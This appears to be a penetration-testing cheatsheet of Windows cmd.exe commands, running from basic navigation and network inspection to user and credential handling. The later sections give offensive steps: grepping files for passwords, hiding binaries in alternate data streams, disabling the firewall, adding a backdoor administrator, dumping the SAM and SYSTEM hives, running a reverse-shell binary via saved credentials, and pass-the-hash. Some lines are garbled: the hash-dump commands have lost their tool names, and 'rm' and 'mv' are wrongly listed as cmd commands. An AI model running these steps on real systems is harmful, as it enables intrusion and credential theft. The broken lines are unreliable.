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File metadata and controls

242 lines (177 loc) · 4.5 KB

Windows Commands Cheatsheet

This is a cheatsheet for common Windows commands.

Windows Local Enum is over here.

These are all for cmd.exe unless stated otherwise. There should be a separate powershell cheatsheet somewhere.

Essential Navigation

# change directory
cd whatever
cd ..
cd "C:\path with spaces\something\"

# print current directory path
echo %cd%

# print file content
type filename.txt
more filename.txt

# directory content
dir /A /R /Q

## show all files (including hidden and system files)
dir /A

## show NTFS streams
dir /R

## metadata (including ownership)
dir /Q

## print recursive directory tree
tree /a /f

## tree-like recursive listing
dir /S

# make directory
mkdir whatever

# remove dir
rm directory

# remove file
del somefile


# copy files
copy C:\somefile C:\somefile_copy

# move file
mv C:\somefileold C:\somefilenew
# SMB network file transfer
## SMB copy from remote to local machine
copy \\<remote_ip>\<remote_smb_share>\somefile.txt C:\local_somefile.txt
copy \\\MYSHARE\somefile.txt C:\local_somefile.txt

# SMB copy from local to remote machine
copy C:\local_somefile.txt \\<remote_ip>\<remote_smb_share>\somefile.txt
copy C:\local_somefile.txt \\\MYSHARE\somefile.txt

### execute binary/script from remote SMB share


# show permissions for directory
icacls C:\

# change permissions for file/directory
CACLS root.txt /e /p Alfred:f

    R – Read
    W – Write
    C – Change (write)
    F – Full control


# whoami
whoami /priv
whoami /groups
whoami /all

# show system info (CPU architecture etc.)
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Manual search passwords in files:
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *.config
# NTFS Alternate Data Streams
dir /R
more < somefile.txt:hiddenproof.txt
type somebinary.exe > somefile.txt:hiddenbinary.exe


# hostname

# network config
ipconfig /all

# available routes
route print

# known adjacent hosts (arp table)
arp -a

Show network shares:

net share

Application ports:

# print open ports
netstat -ano

# find a port
netstat -an | find "<port>"

# find application by pid
tasklist /fi "pid eq 2216"

# show applications associated with port (requires higher privileges)
netstat -ab | more


# show firewall config
netsh firewall show state
netsh firewall show config

# show firewall config (alt)
netsh advfirewall firewall dump

# disable firewall completely (I hope you know what you are doing!)
netsh firewall set opmode disable
NetSh Advfirewall set allprofiles state off


wmic printer list brief

ps> Get-Printer | Format-List

User Management

# list users
net user

# create a user
net user <username> <password> /add

# list local groups
net localgroup

# list local administrators
net localgroup administrators

# create a local group
net localgroup <groupname> /add

# add user to a local group
net localgroup <groupname> <username> /add
net localgroup Administrators pentest /add
net localgroup "Remote Desktop Users" pentest /add

# create new admin account summarized
net user cereal hunter7 /add
net localgroup Administrators cereal /add


# Dump Secure Account Manager (SAM) database (admin required obviously)
reg save hklm\sam %TEMP%\sam
reg save hklm\system %TEMP%\system

# optional (AD)
reg save hklm\security %TEMP%\security

# transfer the files to a machine with impacket installed
# dump user hashes -system system -sam sam LOCAL -system system -sam sam -security security LOCAL

# Alternative path: copy C:\Windows\NTDS\ntds.dit and system -ntds ntds.dit -system system.bak LOCAL
# show saved creds
cmdkey /list

# runas using saved credentials
runas /savecred /user:admin C:\PrivEsc\reverse.exe

# psexec (sysinternals)
psexec \\<target> -d -u <user> -p <password> <command>

# winexe (from kali)
winexe -U 'admin%password123' //<target_ip> cmd.exe

# pass the hash (from kali)
pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:<ntlm_hash>' //<target_ip> cmd.exe